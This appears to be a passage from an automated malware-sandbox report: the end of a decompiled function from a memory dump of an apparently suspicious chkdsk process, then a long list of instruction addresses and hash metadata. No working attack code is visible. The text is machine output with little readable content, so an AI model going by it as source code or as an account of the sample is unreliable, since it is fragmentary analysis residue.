									if( *((intOrPtr*)(_t156 - 0x13c)) == 1) {
										_t140 =  *((intOrPtr*)(_t156 - 0x114));
										_t118 =  *((intOrPtr*)(_t140 + 0x5c));
										 *((short*)(_t156 - 0xda)) = _t118;
										 *((short*)(_t156 - 0xdc)) = _t118;
										 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t140 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
										if(E058704C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
											goto L25;
										}
										_t152 = 0xc0150004;
										L24:
										 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
										goto L25;
									}
									_t152 = 0xc0150005;
									goto L24;
								}
							}
							goto L11;
						}
					}
				}
				L1:
				 *[fs:0x0] =  *((intOrPtr*)(_t156 - 0x10));
				return _t152;
			}















                                                                                                                    0x05859046
                                                                                                                    0x05859046
                                                                                                                    0x0585904b
                                                                                                                    0x05859050
                                                                                                                    0x05859055
                                                                                                                    0x0585905b
                                                                                                                    0x0585905d
                                                                                                                    0x05859066
                                                                                                                    0x0585906f
                                                                                                                    0x05859078
                                                                                                                    0x05859080
                                                                                                                    0x05859088
                                                                                                                    0x0585908f
                                                                                                                    0x05859095
                                                                                                                    0x058590a9
                                                                                                                    0x058590b1
                                                                                                                    0x058590be
                                                                                                                    0x058590c6
                                                                                                                    0x058590cf
                                                                                                                    0x058590e2
                                                                                                                    0x058590f7
                                                                                                                    0x058590fb
                                                                                                                    0x05859118
                                                                                                                    0x00000000
                                                                                                                    0x05859123
                                                                                                                    0x0585913b
                                                                                                                    0x0585913f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x05859147
                                                                                                                    0x058b231f
                                                                                                                    0x058b231f
                                                                                                                    0x00000000
                                                                                                                    0x058b231f
                                                                                                                    0x05859154
                                                                                                                    0x058b2330
                                                                                                                    0x058b2336
                                                                                                                    0x058b2336
                                                                                                                    0x0585915a
                                                                                                                    0x0585915a
                                                                                                                    0x0585915a
                                                                                                                    0x05859161
                                                                                                                    0x05859167
                                                                                                                    0x0585916b
                                                                                                                    0x05859172
                                                                                                                    0x05859182
                                                                                                                    0x0585918e
                                                                                                                    0x05859199
                                                                                                                    0x058591ba
                                                                                                                    0x058591be
                                                                                                                    0x00000000
                                                                                                                    0x058591e0
                                                                                                                    0x058b2358
                                                                                                                    0x058b2360
                                                                                                                    0x058b2368
                                                                                                                    0x058b236a
                                                                                                                    0x058b2372
                                                                                                                    0x00000000
                                                                                                                    0x058b2378
                                                                                                                    0x058b2378
                                                                                                                    0x058b2381
                                                                                                                    0x058b2458
                                                                                                                    0x058b2458
                                                                                                                    0x058b245b
                                                                                                                    0x058b2463
                                                                                                                    0x058b2468
                                                                                                                    0x058b246e
                                                                                                                    0x058b246e
                                                                                                                    0x058b24a7
                                                                                                                    0x00000000
                                                                                                                    0x058b24a7
                                                                                                                    0x058b238f
                                                                                                                    0x058b2396
                                                                                                                    0x058b239c
                                                                                                                    0x058b239f
                                                                                                                    0x058b239f
                                                                                                                    0x058b23bb
                                                                                                                    0x058b23c8
                                                                                                                    0x058b23ca
                                                                                                                    0x058b23d2
                                                                                                                    0x058b244c
                                                                                                                    0x058b244c
                                                                                                                    0x058b2453
                                                                                                                    0x00000000
                                                                                                                    0x058b23d4
                                                                                                                    0x058b23e7
                                                                                                                    0x058b23e9
                                                                                                                    0x058b23f1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058b23f9
                                                                                                                    0x058b2402
                                                                                                                    0x058b2408
                                                                                                                    0x058b240c
                                                                                                                    0x058b2413
                                                                                                                    0x058b2423
                                                                                                                    0x058b243f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058b2441
                                                                                                                    0x058b2446
                                                                                                                    0x058b2446
                                                                                                                    0x00000000
                                                                                                                    0x058b2446
                                                                                                                    0x058b23fb
                                                                                                                    0x00000000
                                                                                                                    0x058b23fb
                                                                                                                    0x058b23d2
                                                                                                                    0x00000000
                                                                                                                    0x058b2372
                                                                                                                    0x058591be
                                                                                                                    0x05859118
                                                                                                                    0x058590fd
                                                                                                                    0x05859102
                                                                                                                    0x0585910e

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $$@
                                                                                                                    • API String ID: 0-1194432280
                                                                                                                    • Opcode ID: 28656c013e408bb6d4eb0a1310da3f391686739eede4098c975a75f78940647e
                                                                                                                    • Instruction ID: f18258694ce7a35ae4fdc43cbdbc2307069fa5e4c2a8009ac074109e716faa78
                                                                                                                    • Opcode Fuzzy Hash: 28656c013e408bb6d4eb0a1310da3f391686739eede4098c975a75f78940647e
                                                                                                                    • Instruction Fuzzy Hash: 2B813975D00269DBDB21CB54CC45BEEB6B8AB08710F0045EAED0AF7290D7709E85CFA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%